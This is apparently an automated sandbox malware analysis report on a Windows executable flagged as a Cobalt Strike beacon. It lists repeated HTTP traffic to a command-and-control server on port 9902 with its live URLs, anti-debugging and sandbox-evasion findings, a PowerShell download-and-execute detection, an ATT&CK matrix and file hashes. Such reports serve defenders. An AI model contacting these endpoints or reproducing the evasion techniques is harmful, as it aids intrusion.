Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 9902
Source: unknown	Network traffic detected: HTTP traffic on port 9902 -> 49836

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA73C148 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0000017DEA73C148

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA72F5C8		0_2_0000017DEA72F5C8
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA733F88		0_2_0000017DEA733F88

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0083A860 rdtscp

0_2_0083A860

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-65389

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

API coverage: 5.4 %

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA733F88

0_2_0000017DEA733F88

Source: C:\Users\user\Desktop\7xRIr23y7v.exe TID: 6176	Thread sleep count: 99 > 30			Jump to behavior
Source: C:\Users\user\Desktop\7xRIr23y7v.exe TID: 6176	Thread sleep time: -5940000s >= -30000s			Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA730ED4 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_0000017DEA730ED4
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA73779C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_0000017DEA73779C

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0080C8C0 GetProcessAffinityMask,GetSystemInfo,

0_2_0080C8C0

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: 7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2AB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#2
Source: 7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2A2C000.00000004.00000020.00020000.00000000.sdmp, 7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2AB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

API call chain: ExitProcess graph end node

graph_0-65462

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0083A860 Start: 0083A869 End: 0083A87F

0_2_0083A860

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0083A860 rdtscp

0_2_0083A860

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

0_2_0000017DEA744C34

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

0_2_0000017DEA744C34

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

0_2_0000017DEA744C34

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA735D58 InitializeProcThreadAttributeList,GetProcessHeap,HeapAlloc,InitializeProcThreadAttributeList,

0_2_0000017DEA735D58

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_00822880 AddVectoredExceptionHandler,RtlAddVectoredContinueHandler,RtlAddVectoredContinueHandler,SetUnhandledExceptionFilter,	0_2_00822880
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA74E4E8 SetUnhandledExceptionFilter,	0_2_0000017DEA74E4E8
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA740270 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0000017DEA740270

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 7xRIr23y7v.exe PID: 6160, type: MEMORYSTR

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA73A7DC LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_0000017DEA73A7DC

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA74E050 AllocateAndInitializeSid,

0_2_0000017DEA74E050

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA72FBD4 CreateNamedPipeA,

0_2_0000017DEA72FBD4

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA73D5AC GetSystemTimeAsFileTime,

0_2_0000017DEA73D5AC

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA73455C GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

0_2_0000017DEA73455C

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Code function: 0_2_0000017DEA73455C GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

0_2_0000017DEA73455C

Source: C:\Users\user\Desktop\7xRIr23y7v.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: Process Memory Space: 7xRIr23y7v.exe PID: 6160, type: MEMORYSTR
Source: Yara match	File source: 0.2.7xRIr23y7v.exe.17dea720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7xRIr23y7v.exe.17dea720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2893779407.0000017DEA9A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2893026267.0000017DE2BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2892307594.000000C0000D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA734CD8 htonl,htons,socket,closesocket,bind,ioctlsocket,	0_2_0000017DEA734CD8
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA7350E0 socket,htons,ioctlsocket,closesocket,bind,listen,	0_2_0000017DEA7350E0
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA74E628 bind,	0_2_0000017DEA74E628
Source: C:\Users\user\Desktop\7xRIr23y7v.exe	Code function: 0_2_0000017DEA73AF84 socket,closesocket,htons,bind,listen,	0_2_0000017DEA73AF84

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	2 Valid Accounts	2 Valid Accounts	2 Valid Accounts	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	21 Access Token Manipulation	11 Virtualization/Sandbox Evasion	LSASS Memory	151 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Process Injection	21 Access Token Manipulation	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	111 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	5 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
7xRIr23y7v.exe	53%	ReversingLabs	Win64.Backdoor.CobaltStrikeBeacon
7xRIr23y7v.exe	53%	Virustotal		Browse
7xRIr23y7v.exe	100%	Avira	TR/Rozena.ouwaq
7xRIr23y7v.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://139.196.73.80:9902/WNwA	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://139.196.73.80:9902/WNwA	true	2%, Virustotal, Browse	unknown
http://139.196.73.80:9902/dpixel	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://139.196.73.80:9902/WNwAf	7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2A84000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://127.0.0.1:%u/	7xRIr23y7v.exe, 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp	false	low
http://139.196.73.80:9902/dpixelp	7xRIr23y7v.exe, 00000000.00000002.2892734126.0000017DE2A84000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
139.196.73.80	unknown	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1427167
Start date and time:	2024-04-17 07:06:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	7xRIr23y7v.exe renamed because original name is a hash value
Original Sample Name:	50c9f9b4fe6c26be872aff095e05a981.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 13 Number of non-executed functions: 174
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:06:59	API Interceptor	99x Sleep call for process: 7xRIr23y7v.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	sYlwfFFwFb.elf	Get hash	malicious	Mirai	Browse	39.106.110.74
	2jQHythw1E.elf	Get hash	malicious	Mirai	Browse	47.99.152.34
	E0sl4ONdra.elf	Get hash	malicious	Mirai	Browse	39.103.164.0
	hiqWVuoNwf.elf	Get hash	malicious	Mirai	Browse	47.99.36.39
	bnNLsZqj8B.elf	Get hash	malicious	Mirai	Browse	8.135.254.111
	tP8j8ZJdua.elf	Get hash	malicious	Mirai	Browse	47.93.232.249
	ksoanz#U8be6#U7ec6_6044.exe	Get hash	malicious	Unknown	Browse	8.138.17.21
	C4OTm1FW94.elf	Get hash	malicious	Mirai	Browse	121.43.15.171
	VOlsbvDoA0.elf	Get hash	malicious	Mirai	Browse	8.181.198.9
	nY3jvpEUvw.elf	Get hash	malicious	Mirai	Browse	8.152.213.47

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.978770435549707
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	7xRIr23y7v.exe
File size:	1'087'488 bytes
MD5:	50c9f9b4fe6c26be872aff095e05a981
SHA1:	c8a0319c185e4f64775401a05bb20dc4aa4e56c6
SHA256:	66d79ffa703a6a51e4fa8dee5ad1ed9b5dc8b228a8e385a0fb1aa5994cb245c1
SHA512:	c0dd2545d17f69b7bce2f18ee21cf6e84e03792ee1df3c75f76739eceae98fd1b4e9953da8b01bf2990686119e2faf3ca98ce13ce624abfb5266b23a12f778e1
SSDEEP:	24576:uSn0N6s6wGwWjt53VnTlZjK3ZgESPzK1:uSnA6s6wGwYX3VpZqZgEGzK1
TLSH:	EC352A8B7C9010BAD0B992318D6652917B71BC980B3227D72F51B3F82F72BD41E76369
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."..........6......@.........@..............................P............`... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x45c040
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
